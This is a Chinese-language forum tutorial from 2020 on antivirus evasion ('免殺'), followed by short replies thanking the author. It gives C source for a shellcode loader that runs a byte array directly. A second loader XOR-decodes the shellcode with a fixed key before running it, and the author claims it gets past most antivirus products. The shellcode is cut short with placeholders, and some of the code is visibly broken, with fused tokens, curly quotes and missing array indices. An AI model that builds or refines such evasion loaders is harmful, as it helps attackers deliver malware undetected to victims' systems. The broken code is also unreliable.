資源共享吧|易語(yǔ)言論壇|逆向破解教程|輔助開(kāi)發(fā)教程|網(wǎng)絡(luò)安全教程|m.hailashopping.com|我的開(kāi)發(fā)技術(shù)隨記

標(biāo)題: 零基礎(chǔ)入門(mén)學(xué)免殺(一) [打印本頁(yè)]
作者: 免殺愛(ài)好者    時(shí)間: 2020-2-21 20:25
標(biāo)題: 零基礎(chǔ)入門(mén)學(xué)免殺(一)
零基礎(chǔ)入門(mén)學(xué)免殺(一)

目前有很多利用shellcode自動(dòng)免殺的工具,但是這些工具的指紋有相似的
如果有人傳到網(wǎng)上掃描被殺或者工具過(guò)時(shí)怎么辦?
這時(shí)你就需要自己制作免殺了
最簡(jiǎn)單的就是shellcode加密直接生成可執(zhí)行文件

直接生成shellcode、
有時(shí)候shellcode是直接可以免殺的  但是有的時(shí)候是會(huì)被殺的

(, 下載次數(shù): 118)

一:無(wú)加密直接自己生成可執(zhí)行文件
分配一些內(nèi)存,拷貝字符數(shù)組到分配的內(nèi)存中,最后執(zhí)行它


#include"stdafx.h"
/* length: 798 bytes*/
unsigned charshellcode[] = “\xfc\xe8\x89\x00\......”//這里寫(xiě)shellcode

int main(intargc, char* argv[])
{
       ((void(*)(void))&shellcode)();
       return 0;
}

(, 下載次數(shù): 105)

直接生成有時(shí)候能過(guò)一部分殺毒



二:加密shellcode生成可執(zhí)行文件

加密的方式有很多,可以加密一次也可以多次加密,我用異或加密演示給大家看

首先把自己的shellcode進(jìn)行異或加密一次,然后把加密的代碼解密執(zhí)行。

我這里把shellcode和0x97異或加密過(guò)后解密執(zhí)行

#include "stdafx.h"
#include <windows.h>
#define KEY 0x97     //進(jìn)行異或的字符
/* length: 798 bytes */
unsigned char buf[] =
"\x6b\x7f\x1e\x97\x97\”   這里輸入你自己加密過(guò)后的shellcode
int main(int argc, char* argv[])
{
  unsigned char c[sizeof(buf)];   //獲取shellcode長(zhǎng)度
  for (int i = 0; i < sizeof(buf)-1; i++)
  {
    c = buf ^ KEY;//進(jìn)行解密
  }


  ( (void(*)(void))&c)(); 執(zhí)行shellcode
  return 0;
}


(, 下載次數(shù): 113)


這個(gè)方法目前可以過(guò)掉大部分殺毒

(, 下載次數(shù): 115)


(, 下載次數(shù): 110)

















作者: asdlxy    時(shí)間: 2020-2-28 13:11
我看不錯(cuò)噢 謝謝樓主!
作者: TkShow    時(shí)間: 2020-3-23 23:34
樓主雷鋒啊,謝謝分享
作者: kkkkkkkkk    時(shí)間: 2020-6-22 21:04
感謝分享,感覺(jué)很實(shí)用
作者: star123    時(shí)間: 2020-7-11 09:38
樓主,我太崇拜你了!
作者: wfandch    時(shí)間: 2020-7-29 14:28
作者: pwndog    時(shí)間: 2023-4-10 20:15
6



歡迎光臨 資源共享吧|易語(yǔ)言論壇|逆向破解教程|輔助開(kāi)發(fā)教程|網(wǎng)絡(luò)安全教程|m.hailashopping.com|我的開(kāi)發(fā)技術(shù)隨記 (http://m.hailashopping.com/) Powered by Discuz! X3.4